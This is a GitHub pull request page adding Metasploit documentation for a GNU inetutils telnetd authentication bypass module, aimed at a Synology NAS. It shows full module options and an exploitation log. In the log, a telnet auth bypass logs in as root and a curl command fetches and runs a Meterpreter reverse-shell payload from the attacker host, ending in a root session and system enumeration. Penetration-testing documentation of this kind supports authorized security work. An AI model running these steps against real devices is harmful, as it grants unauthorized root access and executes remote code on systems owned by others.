Skip to content

add dsm target exploitation to gnu telnetd docs #21005

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
h00die wants to merge 1 commit into
base: master
Choose a base branch
from
+122 −0
Open

add dsm target exploitation to gnu telnetd docs #21005

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
122 changes: 122 additions & 0 deletions documentation/modules/exploit/linux/telnet/gnu_inetutils_auth_bypass.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -136,4 +136,126 @@ Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```

### Synology NAS RS1219+ with DSM 7.2.2-72806 Update 5

```
msf exploit(linux/telnet/gnu_inetutils_auth_bypass) > show options

Module options (exploit/linux/telnet/gnu_inetutils_auth_bypass):

Name Current Setting Required Description
---- --------------- -------- -----------
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PASSWORD no The password for the specified username
PCAPFILE no The name of the PCAP capture file to process
RHOSTS 111.111.1.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 23 yes The target port (TCP)
SNAPLEN 65535 yes The number of bytes to capture
TERMINAL_SPEED 38400 yes Terminal speed to set when authenticating
TERMINAL_TYPE XTERM-256COLOR yes Terminal type to set when authenticating
TIMEOUT 500 yes The number of seconds to wait for new data
USERNAME root yes Username on device to bypass authentication as


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, pyth
on3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST 222.222.2.222 yes The listen address (an interface may be specified)
LPORT 9114 yes The listen port


When FETCH_COMMAND is one of CURL,GET,WGET:

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.


When FETCH_FILELESS is none:

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME fgVcDYiZpgP no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces


Exploit target:

Id Name
-- ----
0 Automatic



View the full module info with the info, or info -d command.

msf exploit(linux/telnet/gnu_inetutils_auth_bypass) > exploit
^C[-] exploit: Interrupted
msf exploit(linux/telnet/gnu_inetutils_auth_bypass) > exploit -j
[*] Command to run on remote host: curl -so ./OyRNMDvaMc http://222.222.2.222:8080/mLMwZw4404UPfkHiBUanzg;chmod +x ./OyRNMDvaMc;./OyRNMDvaMc&
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on 222.222.2.222:8080
[*] HTTP server started
[*] Adding resource /mLMwZw4404UPfkHiBUanzg
[*] Started reverse TCP handler on 222.222.2.222:9114
msf exploit(linux/telnet/gnu_inetutils_auth_bypass) > [*] 111.111.1.1:23 - Connecting to telnet service...
[*] 111.111.1.1:23 - Incoming Bytes: IAC WILL AUTHENTICATION IAC WILL ENCRYPT IAC DO TTYPE IAC DO TSPEED IAC DO XDISPLOC IAC DO NEW_ENVIRON IAC DO OLD_ENVIRON
[*] 111.111.1.1:23 - Incoming Bytes: IAC DO AUTHENTICATION IAC SB AUTHENTICATION ECHO RCP RCP RCP BINARY IAC SE IAC WILL SGA IAC DO NAWS IAC DO LFLOW IAC DO LINEMODE IAC SB LINEMODE ECHO NAOLFD IAC SE
[*] 111.111.1.1:23 - Incoming Bytes: IAC WILL STATUS
[*] 111.111.1.1:23 - Incoming Bytes: IAC SB TSPEED ECHO IAC SE IAC SB NEW_ENVIRON ECHO IAC SE IAC SB TTYPE ECHO IAC SE
[*] 111.111.1.1:23 - Sending authentication bypass...
[*] 111.111.1.1:23 - Incoming Bytes: IAC DO ECHO
[*] 111.111.1.1:23 - Incoming Bytes: IAC WILL ECHO IAC DO BINARY IAC SB LFLOW SGA IAC SE IAC DONT LINEMODE
[*] 111.111.1.1:23 - Incoming Bytes: IAC SB LINEMODE SGA ECHO BINARY BINARY SGA 0xe2 SGA NAMS 0x82 NAOVTD STATUS 0x82 DET RCTE 0xe2 TTYLOC NAOL 0x82 NAMS NAOP 0xc2 TUID NAOCRD 0x82 0x7f NAOHTS 0x82 SUPDUP NAOHTD 0x82 SNDLOC NAOFFD 0x82 LOGOUT NAOVTS 0x82 SUPDUPOUTPUT NAOVTD 0x82 XASCII NAOLFD 0x82 BM XASCII 0x80 IAC IAC LOGOUT 0x80 IAC IAC IAC SE
[*] 111.111.1.1:23 - Sending payload...
[*] 111.111.1.1:23 - Incoming Bytes: DM
[*] 111.111.1.1:23 - Incoming Bytes: 0x63 0x75 0x72 0x6c TSPEED 0x2d 0x73 0x6f TSPEED 0x2e 0x2f 0x4f 0x79 0x52 0x4e 0x4d 0x44 0x76 0x61 0x4d 0x63 TSPEED 0x68 0x74 0x74 0x70 0x3a 0x2f 0x2f 0x31 0x39 0x32 0x2e 0x31 0x36 0x38 0x2e 0x32 0x2e 0x32 0x32 0x38 0x3a 0x38 0x30 0x38 0x30 0x2f 0x6d 0x4c 0x4d 0x77 0x5a 0x77 0x34 0x34 0x30 0x34 0x55 0x50 0x66 0x6b 0x48 0x69 0x42 0x55 0x61 0x6e 0x7a 0x67 0x3b 0x63 0x68 0x6d 0x6f 0x64 TSPEED 0x2b 0x78 TSPEED 0x2e 0x2f 0x4f 0x79 0x52 0x4e 0x4d 0x44 0x76 0x61 0x4d 0x63 0x3b 0x2e 0x2f 0x4f 0x79 0x52 0x4e 0x4d 0x44 0x76 0x61 0x4d 0x63 ENCRYPT NAOFFD NAOCRD NAOFFD NAOCRD
[*] 111.111.1.1:23 - Incoming Bytes: NAOFFD NAOCRD 0x55 0x73 0x69 0x6e 0x67 TSPEED 0x74 0x65 0x72 0x6d 0x69 0x6e 0x61 0x6c TSPEED 0x63 0x6f 0x6d 0x6d 0x61 0x6e 0x64 0x73 TSPEED 0x74 0x6f TSPEED 0x6d 0x6f 0x64 0x69 0x66 0x79 TSPEED 0x73 0x79 0x73 0x74 0x65 0x6d TSPEED 0x63 0x6f 0x6e 0x66 0x69 0x67 0x73 0x2c TSPEED 0x65 0x78 0x65 0x63 0x75 0x74 0x65 TSPEED 0x65 0x78 0x74 0x65 0x72 0x6e 0x61 0x6c TSPEED 0x62 0x69 0x6e 0x61 0x72 0x79 NAOFFD NAOCRD 0x66 0x69 0x6c 0x65 0x73 0x2c TSPEED 0x61 0x64 0x64 TSPEED 0x66 0x69 0x6c 0x65 0x73 0x2c TSPEED 0x6f 0x72 TSPEED 0x69 0x6e 0x73 0x74 0x61 0x6c 0x6c TSPEED 0x75 0x6e 0x61 0x75 0x74 0x68 0x6f 0x72 0x69 0x7a 0x65 0x64 TSPEED 0x74 0x68 0x69 0x72 0x64 0x2d 0x70 0x61 0x72 0x74 0x79 TSPEED 0x61 0x70 0x70 0x73 TSPEED 0x6d 0x61 0x79 TSPEED 0x6c 0x65 0x61 0x64 TSPEED 0x74 0x6f TSPEED 0x73 0x79 0x73 0x74 0x65 0x6d NAOFFD NAOCRD 0x64 0x61 0x6d 0x61 0x67 0x65 0x73 TSPEED 0x6f 0x72 TSPEED 0x75 0x6e 0x65 0x78 0x70 0x65 0x63 0x74 0x65 0x64 TSPEED 0x62 0x65 0x68 0x61 0x76 0x69 0x6f 0x72 0x2c TSPEED 0x6f 0x72 TSPEED 0x63 0x61 0x75 0x73 0x65 TSPEED 0x64 0x61 0x74 0x61 TSPEED 0x6c 0x6f 0x73 0x73 0x2e TSPEED 0x4d 0x61 0x6b 0x65 TSPEED 0x73 0x75 0x72 0x65 TSPEED 0x79 0x6f 0x75 TSPEED 0x61 0x72 0x65 TSPEED 0x61 0x77 0x61 0x72 0x65 TSPEED 0x6f 0x66 NAOFFD NAOCRD 0x74 0x68 0x65 TSPEED 0x63 0x6f 0x6e 0x73 0x65 0x71 0x75 0x65 0x6e 0x63 0x65 0x73 TSPEED 0x6f 0x66 TSPEED 0x65 0x61 0x63 0x68 TSPEED 0x63 0x6f 0x6d 0x6d 0x61 0x6e 0x64 TSPEED 0x61 0x6e 0x64 TSPEED 0x70 0x72 0x6f 0x63 0x65 0x65 0x64 TSPEED 0x61 0x74 TSPEED 0x79 0x6f 0x75 0x72 TSPEED 0x6f 0x77 0x6e TSPEED 0x72 0x69 0x73 0x6b 0x2e NAOFFD NAOCRD NAOFFD NAOCRD 0x57 0x61 0x72 0x6e 0x69 0x6e 0x67 0x3a TSPEED 0x44 0x61 0x74 0x61 TSPEED 0x73 0x68 0x6f 0x75 0x6c 0x64 TSPEED 0x6f 0x6e 0x6c 0x79 TSPEED 0x62 0x65 TSPEED 0x73 0x74 0x6f 0x72 0x65 0x64 TSPEED 0x69 0x6e TSPEED 0x73 0x68 0x61 0x72 0x65 0x64 TSPEED 0x66 0x6f 0x6c 0x64 0x65 0x72 0x73 0x2e TSPEED 0x44 0x61 0x74 0x61 TSPEED 0x73 0x74 0x6f 0x72 0x65 0x64 TSPEED 0x65 0x6c 0x73 0x65 0x77 0x68 0x65 0x72 0x65 NAOFFD NAOCRD 0x6d 0x61 0x79 TSPEED 0x62 0x65 TSPEED 0x64 0x65 0x6c 0x65 0x74 0x65 0x64 TSPEED 0x77 0x68 0x65 0x6e TSPEED 0x74 0x68 0x65 TSPEED 0x73 0x79 0x73 0x74 0x65 0x6d TSPEED 0x69 0x73 TSPEED 0x75 0x70 0x64 0x61 0x74 0x65 0x64 0x2f 0x72 0x65 0x73 0x74 0x61 0x72 0x74 0x65 0x64 0x2e NAOFFD NAOCRD NAOFFD NAOCRD
[*] 111.111.1.1:23 - Incoming Bytes: OUTMRK 0x5b 0x30 0x31 0x3b 0x33 0x32 0x6d 0x72 0x6f 0x6f 0x74 0x40 0x72 0x61 0x67 0x65 0x6e 0x61 0x73 OUTMRK 0x5b 0x30 0x30 0x6d 0x3a OUTMRK 0x5b 0x30 0x31 0x3b 0x33 0x34 0x6d 0x7e OUTMRK 0x5b 0x30 0x30 0x6d XDISPLOC TSPEED 0x63 0x75 0x72 0x6c TSPEED 0x2d 0x73 0x6f TSPEED 0x2e 0x2f 0x4f 0x79 0x52 0x4e 0x4d 0x44 0x76 0x61 0x4d 0x63 TSPEED 0x68 0x74 0x74 0x70 0x3a 0x2f 0x2f 0x31 0x39 0x32 0x2e 0x31 0x36 0x38 0x2e 0x32 0x2e 0x32 0x32 0x38 0x3a 0x38 0x30 0x38 0x30 0x2f 0x6d 0x4c 0x4d 0x77 0x5a 0x77 0x34 0x34 0x30 0x34 0x55 0x50 0x66 0x6b 0x48 0x69 0x42 0x55 0x61 0x6e 0x7a 0x67 0x3b 0x63 0x68 0x6d 0x6f 0x64 TSPEED 0x2b 0x78 TSPEED 0x2e 0x2f 0x4f 0x79 0x52 0x4e 0x4d 0x44 0x76 0x61 0x4d 0x63 0x3b 0x2e 0x2f 0x4f 0x79 0x52 0x4e 0x4d 0x44 0x76 0x61 0x4d 0x63 ENCRYPT NAOFFD NAOCRD
[*] Client 111.111.1.1 requested /mLMwZw4404UPfkHiBUanzg
[*] Sending payload to 111.111.1.1 (curl/7.86.0)
[*] 111.111.1.1:23 - Incoming Bytes: 0x5b 0x31 0x5d TSPEED 0x31 0x34 0x39 0x36 0x31 NAOFFD NAOCRD OUTMRK 0x5b 0x30 0x31 0x3b 0x33 0x32 0x6d 0x72 0x6f 0x6f 0x74 0x40 0x72 0x61 0x67 0x65 0x6e 0x61 0x73 OUTMRK 0x5b 0x30 0x30 0x6d 0x3a OUTMRK 0x5b 0x30 0x31 0x3b 0x33 0x34 0x6d 0x7e OUTMRK 0x5b 0x30 0x30 0x6d XDISPLOC TSPEED NAOFFD NAOCRD OUTMRK 0x5b 0x30 0x31 0x3b 0x33 0x32 0x6d 0x72 0x6f 0x6f 0x74 0x40 0x72 0x61 0x67 0x65 0x6e 0x61 0x73 OUTMRK 0x5b 0x30 0x30 0x6d 0x3a OUTMRK 0x5b 0x30 0x31 0x3b 0x33 0x34 0x6d 0x7e OUTMRK 0x5b 0x30 0x30 0x6d XDISPLOC TSPEED
[*] Meterpreter session 8 opened (222.222.2.222:9114 -> 111.111.1.1:42414) at 2026-02-21 08:45:57 -0500

msf exploit(linux/telnet/gnu_inetutils_auth_bypass) > sessions -i 8
[*] Starting interaction with 8...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : synologynas
OS : (Linux 3.10.108)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > cat /etc.defaults/VERSION
majorversion="7"
minorversion="2"
major="7"
minor="2"
micro="2"
buildphase="GM"
buildnumber="72806"
smallfixnumber="5"
nano="5"
base="72806"
productversion="7.2.2"
os_name="DSM"
builddate="2025/11/10"
buildtime="10:35:42"
meterpreter > cat /proc/sys/kernel/syno_hw_version
RS1219+-j
```